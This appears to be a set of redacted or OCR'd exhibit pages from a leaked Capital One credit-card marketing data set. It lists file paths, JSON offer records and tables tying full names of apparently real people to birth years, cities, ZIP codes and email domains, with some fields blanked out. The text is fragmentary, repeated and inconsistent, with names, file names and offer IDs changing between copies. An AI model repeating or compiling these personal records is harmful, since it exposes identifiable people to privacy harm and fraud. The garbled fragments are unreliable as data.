| SEATTLE | WA98122 | @gmail.com |
| SEATTLE | WA98106 | @icloud.com |
| SEATTLE | WA98168 | @yahoo.com |
| SEATTLE | WA98118 | @gmail.com |
| SEATTLE | WA98118 | @gmail.com |
| SEATTLE | WA98122 | @gmail.com |
| SEATTLE | WA98133 | @gmail.com |

781-006

@aol.com","dmsCreativeId":"40448","dmsCreativeVars":"{\"subjectLineEnd\":\", you are pre-approved for this Capital One Starter Card offer--a credit card with no deposit requirement\"}","dmCreativeVars":"{}"}
ymail.com","dmsCreativeId":"40448","dmsCreativeVars":"{\"subjectLineEnd\":\", you are pre-approved for this Capital One Starter Card offer--a credit card with no deposit requirement\"}","dmCreativeVars":"{}"}
STR0010000AD
STR0010000GP
STR0010000IO
STR0010000JE
STR0020002IT
STR0020002ON
STR0020002NK
STR0020004445
STR0020004C4
STR0020005ON
STR0020005MA
STR0040000MFD
STR0040000UM
STR0040000P16
STR0040000PEL
STR0040000PHS
STR0040000PNR
STR0040000QL9
STR0040000QQV
STR0040000QNH
STR0040000TC1
STR0040000UJ6
STR0040000UKV
STR0040000UNJ
STR0040000WHF
STR0040000X3C
STR0040000XT3
STR0040000YDM
STR0040000Z49
STR0040000106W
STR0070001I4I
STR0070001IZ2
STR0070001LNX
STR0070001NJM



./ACKIOM-inclusion-list/COF.ACX.EML.PRD.CI_CP1_STR_17120700400.dat:Michael J Moore                                                              SEATTLE
./ACKIOM-inclusion-list/COF.ACX.EML.PRD.CI_CP1_STR_17120700400.dat:Jose Garcia                                                                   SEATTLE
./ACKIOM-inclusion-list/COF.ACX.EML.PRD.CI_CP1_STR_18012200700.dat:Jaquila T Sparks                                                              SEATTLE
./ACKIOM-inclusion-list/COF.ACX.EML.PRD.CI_CP1_STR_18012200700.dat:Nick A Von Schneidau                                                          SEATTLE
./ACKIOM-inclusion-list/COF.ACX.EML.PRD.CI_CP1_STR_18012200700.dat:Justin W Jonson                                                               SEATTLE
./ACKIOM-inclusion-list/COF.ACX.EML.PRD.CI_CP1_STR_18012200700.dat:Isaias A Martinez                                                             SEATTLE
./ACKIOM-inclusion-list/COF.ACX.EML.PRD.CI_CP1_STR_18012200700.dat:Anthony Spataro                                                               SEATTLE
./ACKIOM-inclusion-list/COF.ACX.EML.PRD.CI_CP1_STR_18012200700.dat:Feven T Matewos                                                               SEATTLE
./ACKIOM-inclusion-list/COF.ACX.EML.PRD.CI_CP1_STR_18012200700.dat:Debbie L Fola                                                                 SEATTLE
./ACKIOM-inclusion-list/COF.ACX.EML.PRD.CI_CP1_STR_18012200700.dat:Mohamed A Sheikh                                                              SEATTLE
./ACKIOM-inclusion-list/COF.ACX.EML.PRD.CI_CP1_STR_18012200700.dat:Vincent G Scotti                                                              SEATTLE
./ACKIOM-inclusion-list/COF.ACX.EML.PRD.CI_CP1_STR_18012200700.dat:Sean M Parker                                                                 SEATTLE
./ACKIOM-inclusion-list/COF.ACX.EML.PRD.CI_CP1_STR_18012200700.dat:Mary Ann P Libed                                                              RENTON
./ACKIOM-inclusion-list/COF.ACX.EML.PRD.CI_CP1_STR_18012200700.dat:Jennifer E Schweitzer                                                         SEATTLE
./ACKIOM-inclusion-list/COF.ACX.EML.PRD.CI_CP1_STR_18012200700.dat:Kejavu P Taylor                                                               SEATTLE
./ACKIOM-inclusion-list/COF.ACX.EML.PRD.CI_CP1_STR_17120600300.dat:Tyler J Accornero                                                             SEATTLE
./ACKIOM-inclusion-list/COF.ACX.EML.PRD.CI_CP1_STR_17120600300.dat:Carolyn A Street                                                              SEATTLE
./ACKIOM-inclusion-list/COF.ACX.EML.PRD.CI_CP1_STR_17120600300.dat:Bowen Sun                                                                     SEATTLE
./ACKIOM-inclusion-list/COF.ACX.EML.PRD.CI_CP1_STR_17120600300.dat:Muna Adam                                                                     SEATTLE
./ACKIOM-inclusion-list/COF.ACX.EML.PRD.CI_CP1_STR_17120600300.dat:Vernon V Thompson                                                             SEATTLE
./ACKIOM-inclusion-list/COF.ACX.EML.PRD.CI_CP1_STR_17120600300.dat:Angela N Morelli                                                              SEATTLE
./ACKIOM-inclusion-list/COF.ACX.EML.PRD.CI_CP1_STR_17120600300.dat:Linda K Woods                                                                 SEATTLE
./ACKIOM-inclusion-list/COF.ACX.EML.PRD.CI_CP1_STR_17120600300.dat:Albertine Yamery                                                              SEATTLE
./ACKIOM-inclusion-list/COF.ACX.EML.PRD.CI_CP1_STR_17120600300.dat:Jose Garcia                                                                   SEATTLE
./ACKIOM-inclusion-list/COF.ACX.EML.PRD.CI_CP1_STR_17120600300.dat:Blair R Weintraub                                                             SEATTLE
./ACKIOM-inclusion-list/COF.ACX.EML.PRD.CI_CP1_STR_17120600300.dat:Eddie Velez Medero                                                            SEATTLE
./ACKIOM-inclusion-list/COF.ACX.EML.PRD.CI_CP1_STR_17120600300.dat:Kadijah Reese                                                                 SEATTLE
./ACKIOM-inclusion-list/COF.ACX.EML.PRD.CI_CP1_STR_17120600300.dat:Donald M Wallingford                                                          SEATTLE
./ACKIOM-inclusion-list/COF.ACX.EML.PRD.CI_CP1_STR_17120600300.dat:Tanisha G Mowatt                                                              SEATTLE
./ACKIOM-inclusion-list/COF.ACX.EML.PRD.CI_CP1_STR_17121200500.dat:Fredrick W Nelson                                                             SEATTLE
./ACKIOM-inclusion-list/COF.ACX.EML.PRD.CI_CP1_STR_17121200500.dat:Jeffrey S Peters                                                              SEATTLE
./ACKIOM-inclusion-list/COF.ACX.EML.PRD.CI_CP1_STR_17121200500.dat:Kayla Hendrickson                                                             HOUSTON
./ACKIOM-inclusion-list/COF.ACX.EML.PRD.CI_CP1_STR_17121200500.dat:London C Brown                                                                SEATTLE
./ACKIOM-inclusion-list/COF.ACX.EML.PRD.CI_CP1_STR_17121200500.dat:Albertine Yamery                                                              SEATTLE
./ACKIOM-inclusion-list/COF.ACX.EML.PRD.CI_CP1_STR_17121200500.dat:Corina Manzanares                                                             EDINBURG
./ACKIOM-inclusion-list/COF.ACX.EML.PRD.CI_CP1_STR_17121200500.dat:Florence V Arellano                                                           SEATTLE
./ACKIOM-inclusion-list/COF.ACX.EML.PRD.CI_CP1_STR_17121200500.dat:Bowen Sun                                                                     SEATTLE
./ACKIOM-inclusion-list/COF.ACX.EML.PRD.CI_CP1_STR_17121200500.dat:Tanisha G Mowatt                                                              SEATTLE
./ACKIOM-inclusion-list/COF.ACX.EML.PRD.CI_CP1_STR_17121200500.dat:Jason S Robbins                                                              SEATTLE
./ACKIOM-inclusion-list/COF.ACX.EML.PRD.CI_CP1_STR_17121200500.dat:Benjamin S Cockrel                                                            SEATTLE
./ACKIOM-inclusion-list/COF.ACX.EML.PRD.CI_CP1_STR_17121200500.dat:Joseph A Baleda                                                               SEATTLE
./TS-inclusion-list/20171130093436_STR_002_ts-inclusion.json:{"offerId":"0002NI","dateOfBirth":"1960    ","lastFourSSN":    ","firstName":"Ray","middleName":"E","lastName":"Sawyers","suffix":"","addrLine1:                    ","addrL
./TS-inclusion-list/20171130093436_STR_002_ts-inclusion.json:{"offerId":"0002II","dateOfBirth":"1994    ","lastFourSSN":    ","firstName":"Devon","middleName":"A","lastName":"Tooke","suffix":"","addrLine1:                    ","addrLine2
./TS-inclusion-list/20171130093436_STR_002_ts-inclusion.json:{"offerId":"0002ON","dateOfBirth":"1989    ","lastFourSSN":    ","firstName":"Sarah","middleName":"","lastName":"Neumann","suffix":"","addrLine1:                    ","addrLine

| City | State/Zip | Email |
|---|---|---|
| SEATTLE | WA98106 | @icloud.com |
| SEATTLE | WA98166 | @yahoo.com |
| SEATTLE | WA98118 | @gmail.com |
| SEATTLE | WA98118 | @gmail.com |
| SEATTLE | WA98122 | @gmail.com |
| SEATTLE | WA98133 | @gmail.com |
| SEATTLE | WA9813319 | @gmail.com |
| SEATTLE | WA98108 | @yahoo.com |
| SEATTLE | WA98168 | @yahoo.com |
| SEATTLE | WA98133 | @yahoo.com |
| SEATTLE | WA98115 | @hotmail.com |
| SEATTLE | WA98118 | @yahoo.com |
| RENTON | WA98057 | @gmail.com |
| SEATTLE | WA98112 | @aol.com |
| SEATTLE | WA98133 | @ymail.com |
| SEATTLE | WA98119 | @yahoo.com |
| SEATTLE | WA98122 | @gmail.com |
| SEATTLE | WA98105 | @gmail.com |
| SEATTLE | WA98125 | @gmail.com |
| SEATTLE | WA98178 | @gmail.com |
| SEATTLE | WA98117 | @yahoo.com |
| SEATTLE | WA98101 | @gmail.com |
| SEATTLE | WA98106 | @gmail.com |
| SEATTLE | WA98168 | @yahoo.com |
| SEATTLE | WA98104 | @gmail.com |
| SEATTLE | WA98101 | @gmail.com |
| SEATTLE | WA98106 | @gmail.com |
| SEATTLE | WA98102 | @gmail.com |
| SEATTLE | WA98168 | @gmail.com |
| SEATTLE | WA98107 | @gmail.com |
| SEATTLE | WA98126 | @hotmail.com |
| HOUSTON | TX77065 | @gmail.com |
| SEATTLE | WA98126 | @gmail.com |
| SEATTLE | WA98106 | @gmail.com |
| EDINBURG | TX78539 | @yahoo.com |
| SEATTLE | WA98118 | @yahoo.com |
| SEATTLE | WA98105 | @gmail.com |
| SEATTLE | WA98168 | @gmail.com |
| SEATTLE | WA98106 | @aol.com |
| SEATTLE | WA98103 | @gmail.com |
| SEATTLE | WA98109 | @gmail.com |

STR004000Z49
STR00400106W
STR007001I4I
STR007001IZ2
STR007001LNX
STR007001NJM
STR007001NV5
STR007001QQ5
STR007001OYC
STR007001PCA
STR007001PDG
STR007001RSM
STR007001TM2
STR007001TQD
STR007001VEF
STR0030006EC
STR0030006MZ
STR003000J7JU
STR003000914
STR003000ANO
STR0030008Z7
STR003000O5F
STR003000O7Y
STR003000OAI
STR003000F5B
STR003000GSL
STR003000IO7
STR003000IXS
STR003000JSK
STR0050011V2
STR0050012NT
STR00500139N
STR00500143B
STR0050017E5
STR0050017OX
STR0050018CH
STR0050018OL
STR0050019PG
STR005001D0O
STR005001DAA
STR005001DG3

Id":"40447","dmsCreativeVars":"{\"subjectLineEnd\":\", you are pre-approved for this Capital One Starter Card offer--a credit card with no deposit requirement\"}","dmCreativeVars":"{}"}
:"40447","dmsCreativeVars":"{\"subjectLineEnd\":\", you are pre-approved for this Capital One Starter Card offer--a credit card with no deposit requirement\"}","dmCreativeVars":"{}"}
47","dmsCreativeVars":"{\"subjectLineEnd\":\", you are pre-approved for this Capital One Starter Card offer--a credit card with no deposit requirement\"}","dmCreativeVars":"{}"}
eativeId":"40447","dmsCreativeVars":"{\"subjectLineEnd\":\", you are pre-approved for this Capital One Starter Card offer--a credit card with no deposit requirement\"}","dmCreativeVars":"{}"}
"dmsCreativeId":"40448","dmsCreativeVars":"{\"subjectLineEnd\":\", you are pre-approved for this Capital One Starter Card offer--a credit card with no deposit requirement\"}","dmCreativeVars":"{}"}
eativeId":"40448","dmsCreativeVars":"{\"subjectLineEnd\":\", you are pre-approved for this Capital One Starter Card offer--a credit card with no deposit requirement\"}","dmCreativeVars":"{}"}
448","dmsCreativeVars":"{\"subjectLineEnd\":\", you are pre-approved for this Capital One Starter Card offer--a credit card with no deposit requirement\"}","dmCreativeVars":"{}"}
eId":"40448","dmsCreativeVars":"{\"subjectLineEnd\":\", you are pre-approved for this Capital One Starter Card offer--a credit card with no deposit requirement\"}","dmCreativeVars":"{}"}
ativeId":"40447","dmsCreativeVars":"{\"subjectLineEnd\":\", you are pre-approved for this Capital One Starter Card offer--a credit card with no deposit requirement\"}","dmCreativeVars":"{}"}
d":"40447","dmsCreativeVars":"{\"subjectLineEnd\":\", you are pre-approved for this Capital One Starter Card offer--a credit card with no deposit requirement\"}","dmCreativeVars":"{}"}
iveId":"40447","dmsCreativeVars":"{\"subjectLineEnd\":\", you are pre-approved for this Capital One Starter Card offer--a credit card with no deposit requirement\"}","dmCreativeVars":"{}"}
m","dmsCreativeId":"40447","dmsCreativeVars":"{\"subjectLineEnd\":\", you are pre-approved for this Capital One Starter Card offer--a credit card with no deposit requirement\";","dmCreativeVars":"{}"}

781-010

./ACXIOM-inclusion-list/COF.ACK.EML.PRD.CI_CP1_STR_17121200500.dat:Jason S Robbins
./ACXIOM-inclusion-list/COF.ACK.EML.PRD.CI_CP1_STR_17121200500.dat:Benjamin S Cockrel
./ACXIOM-inclusion-list/COF.ACK.EML.PRD.CI_CP1_STR_17121200500.dat:Joseph A Baleda
./TS-inclusion-list/20171130093436_STR_002_ts-inclusion.json:{"offerId":"0001WI","dateOfBirth":"1960 ,"lastFourSSN": "firstName":"Ray","middleName":"E","lastName":"Sawyers","suffix":"","addrLine1":" ,"addrL
./TS-inclusion-list/20171130093436_STR_002_ts-inclusion.json:{"offerId":"0002IT","dateOfBirth":"1994 ,"lastFourSSN": "firstName":"Devon","middleName":"A","lastName":"Tooke","suffix":"","addrLine1" "addrLine2
./TS-inclusion-list/20171130093436_STR_002_ts-inclusion.json:{"offerId":"00020N","dateOfBirth":"1989 ,"lastFourSSN": "firstName":"Sarah","middleName":"","lastName":"Neumann","suffix":"","addrLine1" ,"addrLine
./TS-inclusion-list/20171130093436_STR_002_ts-inclusion.json:{"offerId":"0002AK","dateOfBirth":"1993 ,"lastFourSSN": "firstName":"Viridiana","middleName":"","lastName":"Gallegos","suffix":"","addrLine1" ,"add
./TS-inclusion-list/20171130093436_STR_002_ts-inclusion.json:{"offerId":"00044G","dateOfBirth":"1985 ,"lastFourSSN": "firstName":"Nicholas","middleName":"A","lastName":"Vanschaick","suffix":"","addrLine1"
./TS-inclusion-list/20171130093436_STR_002_ts-inclusion.json:{"offerId":"0004C4","dateOfBirth":"1991 ,"lastFourSSN": "firstName":"Andrew","middleName":"C","lastName":"Campbell","suffix":"","addrLine1":
./TS-inclusion-list/20171130093436_STR_002_ts-inclusion.json:{"offerId":"00050N","dateOfBirth":"1985 ,"lastFourSSN": "firstName":"Michael","middleName":"A","lastName":"Nyman","suffix":"","addrLine1": ,"addrLin
./TS-inclusion-list/20171130093436_STR_002_ts-inclusion.json:{"offerId":"0005MA","dateOfBirth":"1965 ,"lastFourSSN": "firstName":"Genaro","middleName":"A","lastName":"Alfonzo","suffix":"","addrLine1": ,"addrLi
./TS-inclusion-list/20171100505059_STR_001_ts-inclusion.json:{"offerId":"0000AD","dateOfBirth":"1960 ,"lastFourSSN": "firstName":"Dennis","middleName":"P","lastName":"Rajski","suffix":"","addrLine1": ,"addrLine
./TS-inclusion-list/20171100505059_STR_001_ts-inclusion.json:{"offerId":"0000GP","dateOfBirth":"1978 ,"lastFourSSN": "firstName":"Timothy","middleName":"N","lastName":"Casey","suffix":"","addrLine1" "addrLine2"
./TS-inclusion-list/20171100505059_STR_001_ts-inclusion.json:{"offerId":"0000IO","dateOfBirth":"1981 ,"lastFourSSN": "firstName":"Sheryl","middleName":"C","lastName":"Gregory","suffix":"","addrLine1" ,"addrL
./TS-inclusion-list/20171100505059_STR_001_ts-inclusion.json:{"offerId":"0000JE","dateOfBirth":"1990 ,"lastFourSSN": "firstName":"Casandra","middleName":"D","lastName":"Hilenski","suffix":"","addrLine1" ,"add
./TS-inclusion-list/20171205093533_STR_003_ts-inclusion.json:{"offerId":"0006EC","dateOfBirth":"1986 ,"lastFourSSN": "firstName":"Tyler","middleName":"J","lastName":"Accornero","suffix":"","addrLine1": ,"addrLin
./TS-inclusion-list/20171205093533_STR_003_ts-inclusion.json:{"offerId":"0006MZ","dateOfBirth":"1959 ,"lastFourSSN": "firstName":"Carolyn","middleName":"A","lastName":"Street","suffix":"","addrLine1": "addrLine
./TS-inclusion-list/20171205093533_STR_003_ts-inclusion.json:{"offerId":"00073U","dateOfBirth":"1996 ,"lastFourSSN": "firstName":"Bowen","middleName":"","lastName":"Sun","suffix":"","addrLine1": "addrLine2":
./TS-inclusion-list/20171205093533_STR_003_ts-inclusion.json:{"offerId":"000914","dateOfBirth":"1954 ,"lastFourSSN": "firstName":"Muna","middleName":"","lastName":"Adam","suffix":"","addrLine1": "addrLine2":
./TS-inclusion-list/20171205093533_STR_003_ts-inclusion.json:{"offerId":"000ANO","dateOfBirth":"1980 ,"lastFourSSN": "firstName":"Vernon","middleName":"V","lastName":"Thompson","suffix":"","addrLine1" "a
./TS-inclusion-list/20171205093533_STR_003_ts-inclusion.json:{"offerId":"000BZ7","dateOfBirth":"1984 ,"lastFourSSN": "firstName":"Angela","middleName":"N","lastName":"Morelli","suffix":"","addrLine1": ,"addrLin
./TS-inclusion-list/20171205093533_STR_003_ts-inclusion.json:{"offerId":"000D5F","dateOfBirth":"1961 ,"lastFourSSN": "firstName":"Linda","middleName":"K","lastName":"Woods","suffix":"","addrLine1": "addrLine2":"
./TS-inclusion-list/20171205093533_STR_003_ts-inclusion.json:{"offerId":"000D7Y","dateOfBirth":"1941 ,"lastFourSSN": "firstName":"Albertine","middleName":"","lastName":"Yamery","suffix":"","addrLine1": ,"addr
./TS-inclusion-list/20171205093533_STR_003_ts-inclusion.json:{"offerId":"000DAI","dateOfBirth":"1992 ,"lastFourSSN": "firstName":"Jose","middleName":"","lastName":"Garcia","suffix":"","addrLine1":
./TS-inclusion-list/20171205093533_STR_003_ts-inclusion.json:{"offerId":"000FS8","dateOfBirth":"1996 ,"lastFourSSN": "firstName":"Blair","middleName":"R","lastName":"Weintraub","suffix":"","addrLine1"
./TS-inclusion-list/20171205093533_STR_003_ts-inclusion.json:{"offerId":"000GSL","dateOfBirth":"1991 ,"lastFourSSN": "firstName":"Eddie","middleName":"","lastName":"Velez Madero","suffix":"","addrLine1" ,"addr
./TS-inclusion-list/20171205093533_STR_003_ts-inclusion.json:{"offerId":"000IO7","dateOfBirth":"1994 ,"lastFourSSN": "firstName":"Kadijah","middleName":"","lastName":"Reese","suffix":"","addrLine1": ,"add
./TS-inclusion-list/20171205093533_STR_003_ts-inclusion.json:{"offerId":"000IX5","dateOfBirth":"1967 ,"lastFourSSN": "firstName":"Donald","middleName":"N","lastName":"Wallingford","suffix":"","addrLine1":
./TS-inclusion-list/20171205093533_STR_003_ts-inclusion.json:{"offerId":"000JSK","dateOfBirth":"1992 ,"lastFourSSN": "firstName":"Tanisha","middleName":"G","lastName":"Mowatt","suffix":"","addrLine1": "addrLin

SEATTLE
SEATTLE
SEATTLE



SEATTLE                                aaol.com
SEATTLE                                @gmail.com
SEATTLE                                @gmail.com
"lastFourSSN":    "firstName":"Ray","middleName":"E","lastName":"Sawyers","suffix":"","addrLine1":    ,"addrLine2":    ","city":"SEATTLE","state":"WA","zip":"98119","emailAddr":        @gmail.com","dmsCreat
"lastFourSSN":    "firstName":"Devon","middleName":"A","lastName":"Tooke","suffix":"","addrLine1":    "addrLine2"    ,"city":"SEATTLE","state":"WA","zip":"98107","emailAddr":        @icloud.com","dmsCreative
"lastFourSSN":    "firstName":"Sarah","middleName":"","lastName":"Neumann","suffix":"","addrLine1":    ,"addrLine2":"","city":"SEATTLE","state":"WA","zip":"98115","emailAddr":        @gmail.com","dmsCreativeId":
"lastFourSSN":    "firstName":"Viridiana","middleName":"","lastName":"Gallegos","suffix":"","addrLine1":    "addrLine2":"","city":"SEATTLE","state":"WA","zip":"98146","emailAddr":        @yahoo.com","dm
"lastFourSSN":    "firstName":"Nicholas","middleName":"A","lastName":"Vanschaick","suffix":"","addrLine1"    ,"addrLine2"    ,"city":"SEATTLE","state":"WA","zip":"98105","emailAddr":        @gmail.co
"lastFourSSN":    "firstName":"Andrew","middleName":"C","lastName":"Campbell","suffix":"","addrLine1":    ,"addrLine2":        ,"city":"SEATTLE","state":"WA","zip":"98106","emailAddr":        @gmail.com","dm
"lastFourSSN":    "firstName":"Michael","middleName":"A","lastName":"Wyman","suffix":"","addrLine1":    ,"addrLine2":"","city":"SEATTLE","state":"WA","zip":"98115","emailAddr":        @yahoo.com","dmsCreativeId":
"lastFourSSN":    "firstName":"Genaro","middleName":"A","lastName":"Alfonzo","suffix":"","addrLine1":    ,"addrLine2":"","city":"SEATTLE","state":"WA","zip":"98144","emailAddr":        @gmail.com","dmsCrea
"lastFourSSN":    "firstName":"Dennis","middleName":"D","lastName":"Rajski","suffix":"","addrLine1":    ,"addrLine2":    ,"city":"SEATTLE","state":"WA","zip":"98122","emailAddr":        @gmail.com","dms
"lastFourSSN":    "firstName":"Timothy","middleName":"N","lastName":"Casey","suffix":"","addrLine1":    ,"addrLine2":    ,"city":"SEATTLE","state":"WA","zip":"98122","emailAddr":        @gmail.com","dmsCreati
"lastFourSSN":    "firstName":"Sheryl","middleName":"C","lastName":"Gregory","suffix":"","addrLine1":    ,"addrLine2":    ,"city":"SEATTLE","state":"WA","zip":"98116","emailAddr":        @yahoo.com","dmsCr
"lastFourSSN":    "firstName":"Casandra","middleName":"D","lastName":"Hilenski","suffix":"","addrLine1":    ,"addrLine2":    ,"city":"SEATTLE","state":"WA","zip":"98122","emailAddr":        @gmail
"lastFourSSN":    "firstName":"Tyler","middleName":"J","lastName":"Accornero","suffix":"","addrLine1":    ,"addrLine2":    ,"city":"SEATTLE","state":"WA","zip":"98119","emailAddr":        @yahoo.com","dmsCre
"lastFourSSN":    "firstName":"Carolyn","middleName":"A","lastName":"Street","suffix":"","addrLine1":    "addrLine2":    ,"city":"SEATTLE","state":"WA","zip":"98122","emailAddr":        @gmail.com","dmsCreati
"lastFourSSN":    "firstName":"Bowen","middleName":"","lastName":"Sun","suffix":"","addrLine1":    ,"addrLine2"    ,"city":"SEATTLE","state":"WA","zip":"98105","emailAddr":        @gmail.com","dmsCreativeI
"lastFourSSN":    "firstName":"Muna","middleName":"","lastName":"Adam","suffix":"","addrLine1":    "addrLine2":"","city":"SEATTLE","state":"WA","zip":"98125","emailAddr":        @gmail.com","dmsCreativeId":
"lastFourSSN":    "firstName":"Vernon","middleName":"V","lastName":"Thompson","suffix":"","addrLine1":    ,"addrLine2":"","city":"SEATTLE","state":"WA","zip":"98170","emailAddr":        @gmail.com","d
"lastFourSSN":    "firstName":"Angela","middleName":"N","lastName":"Morelli","suffix":"","addrLine1":    ,"addrLine2"    ,"city":"SEATTLE","state":"WA","zip":"98117","emailAddr":        @yahoo.com","dmsCr
"lastFourSSN":    "firstName":"Linda","middleName":"K","lastName":"Woods","suffix":"","addrLine1":    "addrLine2":    ,"city":"SEATTLE","state":"WA","zip":"98101","emailAddr":        @gmail.com","dmsCreat
"lastFourSSN":    "firstName":"Albertine","middleName":"","lastName":"Yanery","suffix":"","addrLine1":    ,"addrLine2":"","city":"SEATTLE","state":"WA","zip":"98106","emailAddr":        @gmail.com","dmsCre
"lastFourSSN":    "firstName":"Jose","middleName":"","lastName":"Garcia","suffix":"","addrLine1"    "addrLine2":    ,"city":"SEATTLE","state":"WA","zip":"98168","emailAddr":
"lastFourSSN":    "firstName":"Blair","middleName":"R","lastName":"Weintraub","suffix":"","addrLine1":    ,"addrLine2"    ,"city":"SEATTLE","state":"WA","zip":"98104","emailAddr":        @gmail.
"lastFourSSN":    "firstName":"Eddie","middleName":"","lastName":"Velez Medero","suffix":"","addrLine1":    ,"addrLine2":    ,"city":"SEATTLE","state":"WA","zip":"98101","emailAddr":        @gmail.com
"lastFourSSN":    "firstName":"Kadijah","middleName":"","lastName":"Reese","suffix":"","addrLine1":    ,"addrLine2":"","city":"SEATTLE","state":"WA","zip":"98105","emailAddr":        @gmail.com","dmsCreat
"lastFourSSN":    "firstName":"Donald","middleName":"M","lastName":"Wallingford","suffix":"","addrLine1":    ,"addrLine2":    ,"city":"SEATTLE","state":"WA","zip":"98102","emailAddr":        @gmai
"lastFourSSN":    "firstName":"Tanisha","middleName":"G","lastName":"Mowatt","suffix":"","addrLine1":    "addrLine2":"","city":"SEATTLE","state":"WA","zip":"98168","emailAddr":        @gmail.com","dmsCreativeId":

mailAddr":            @gmail.com","dmsCreativeId":"40447","dmsCreativeVars":"{\"subjectLineEnd\":\", you are pre-approved for this Capital One Starter Card offer--a credit car
ilAddr":            @icloud.com","dmsCreativeId":"40447","dmsCreativeVars":"{\"subjectLineEnd\":\", you are pre-approved for this Capital One Starter Card offer--a credit card w
dr":            @gmail.com","dmsCreativeId":"40447","dmsCreativeVars":"{\"subjectLineEnd\":\", you are pre-approved for this Capital One Starter Card offer--a credit card with r
ailAddr":            @yahoo.com","dmsCreativeId":"40447","dmsCreativeVars":"{\"subjectLineEnd\":\", you are pre-approved for this Capital One Starter Card offer--a cred
:"98105","emailAddr":            @gmail.com","dmsCreativeId":"40448","dmsCreativeVars":"{\"subjectLineEnd\":\", you are pre-approved for this Capital One Starter Card offer--
98106","emailAddr":            @gmail.com","dmsCreativeId":"40448","dmsCreativeVars":"{\"subjectLineEnd\":\", you are pre-approved for this Capital One Starter Card offer--a cred
ddr":            @yahoo.com","dmsCreativeId":"40448","dmsCreativeVars":"{\"subjectLineEnd\":\", you are pre-approved for this Capital One Starter Card offer--a credit card with
Addr":            @gmail.com","dmsCreativeId":"40448","dmsCreativeVars":"{\"subjectLineEnd\":\", you are pre-approved for this Capital One Starter Card offer--a credit ca
"emailAddr":            @gmail.com","dmsCreativeId":"40447","dmsCreativeVars":"{\"subjectLineEnd\":\", you are pre-approved for this Capital One Starter Card offer--a credi
ailAddr":            @gmail.com","dmsCreativeId":"40447","dmsCreativeVars":"{\"subjectLineEnd\":\", you are pre-approved for this Capital One Starter Card offer--a credit card
"emailAddr":            @yahoo.com","dmsCreativeId":"40447","dmsCreativeVars":"{\"subjectLineEnd\":\", you are pre-approved for this Capital One Starter Card offer--a credit
22","emailAddr":            @gmail.com","dmsCreativeId":"40447","dmsCreativeVars":"{\"subjectLineEnd\":\", you are pre-approved for this Capital One Starter Card offe
"emailAddr":            @yahoo.com","dmsCreativeId":"40447","dmsCreativeVars":"{\"subjectLineEnd\":\", you are pre-approved for this Capital One Starter Card offer--a credit c
emailAddr":            @gmail.com","dmsCreativeId":"40447","dmsCreativeVars":"{\"subjectLineEnd\":\", you are pre-approved for this Capital One Starter Card offer--a credit card
ilAddr":            @gmail.com","dmsCreativeId":"40447","dmsCreativeVars":"{\"subjectLineEnd\":\", you are pre-approved for this Capital One Starter Card offer--a credit card wi
":            @gmail.com","dmsCreativeId":"40447","dmsCreativeVars":"{\"subjectLineEnd\":\", you are pre-approved for this Capital One Starter Card offer--a credit card with r
emailAddr":            @yahoo.com","dmsCreativeId":"40447","dmsCreativeVars":"{\"subjectLineEnd\":\", you are pre-approved for this Capital One Starter Card offer--a cre
"emailAddr":            @yahoo.com","dmsCreativeId":"40447","dmsCreativeVars":"{\"subjectLineEnd\":\", you are pre-approved for this Capital One Starter Card offer--a credit
lAddr":            @gmail.com","dmsCreativeId":"40447","dmsCreativeVars":"{\"subjectLineEnd\":\", you are pre-approved for this Capital One Starter Card offer--a credit ca
ilAddr":            @gmail.com","dmsCreativeId":"40447","dmsCreativeVars":"{\"subjectLineEnd\":\", you are pre-approved for this Capital One Starter Card offer--a credit c
ip":"98168","emailAddr":            @yahoo.com","dmsCreativeId":"40447","dmsCreativeVars":"{\"subjectLineEnd\":\", you are pre-approved for this Capital One Starter Ca
:"98104","emailAddr":            @gmail.com","dmsCreativeId":"40448","dmsCreativeVars":"{\"subjectLineEnd\":\", you are pre-approved for this Capital One Starter Card offe
,"emailAddr":            @gmail.com","dmsCreativeId":"40448","dmsCreativeVars":"{\"subjectLineEnd\":\", you are pre-approved for this Capital One Starter Card offer--a
ailAddr":            @gmail.com","dmsCreativeId":"40448","dmsCreativeVars":"{\"subjectLineEnd\":\", you are pre-approved for this Capital One Starter Card offer--a credit car
":"98102","emailAddr":            @gmail.com","dmsCreativeId":"40448","dmsCreativeVars":"{\"subjectLineEnd\":\", you are pre-approved for this Capital One Starter Card off
ddr":            @gmail.com","dmsCreativeId":"40448","dmsCreativeVars":"{\"subjectLineEnd\":\", you are pre-approved for this Capital One Starter Card offer--a credit card with

STR0050014JB
STR0050017E5
STR00500170X
STR0050018CH
STR0050018OL
STR0050019PG
STR005001D0O
STR005001DAA
STR005001DG3

 pre-approved for this Capital One Starter Card offer--a credit card with no deposit requirement\"}","dmCreativeVars":"{}"}
e-approved for this Capital One Starter Card offer--a credit card with no deposit requirement\"}","dmCreativeVars":"{}"}
roved for this Capital One Starter Card offer--a credit card with no deposit requirement\"}","dmCreativeVars":"{}"}
ou are pre-approved for this Capital One Starter Card offer--a credit card with no deposit requirement\"}","dmCreativeVars":"{}"}
:\", you are pre-approved for this Capital One Starter Card offer--a credit card with no deposit requirement\"}","dmCreativeVars":"{}"}
ou are pre-approved for this Capital One Starter Card offer--a credit card with no deposit requirement\"}","dmCreativeVars":"{}"}
proved for this Capital One Starter Card offer--a credit card with no deposit requirement\"}","dmCreativeVars":"{}"}
e pre-approved for this Capital One Starter Card offer--a credit card with no deposit requirement\"}","dmCreativeVars":"{}"}
u are pre-approved for this Capital One Starter Card offer--a credit card with no deposit requirement\"}","dmCreativeVars":"{}"}
pre-approved for this Capital One Starter Card offer--a credit card with no deposit requirement\"}","dmCreativeVars":"{}"}
are pre-approved for this Capital One Starter Card offer--a credit card with no deposit requirement\"}","dmCreativeVars":"{}"}
d\":\", you are pre-approved for this Capital One Starter Card offer--a credit card with no deposit requirement\"}","dmCreativeVars":"{}"}
re pre-approved for this Capital One Starter Card offer--a credit card with no deposit requirement\"}","dmCreativeVars":"{}"}
pre-approved for this Capital One Starter Card offer--a credit card with no deposit requirement\"}","dmCreativeVars":"{}"}
-approved for this Capital One Starter Card offer--a credit card with no deposit requirement\"}","dmCreativeVars":"{}"}
roved for this Capital One Starter Card offer--a credit card with no deposit requirement\"}","dmCreativeVars":"{}"}
you are pre-approved for this Capital One Starter Card offer--a credit card with no deposit requirement\"}","dmCreativeVars":"{}"}
are pre-approved for this Capital One Starter Card offer--a credit card with no deposit requirement\"}","dmCreativeVars":"{}"}
 pre-approved for this Capital One Starter Card offer--a credit card with no deposit requirement\"}","dmCreativeVars":"{}"}
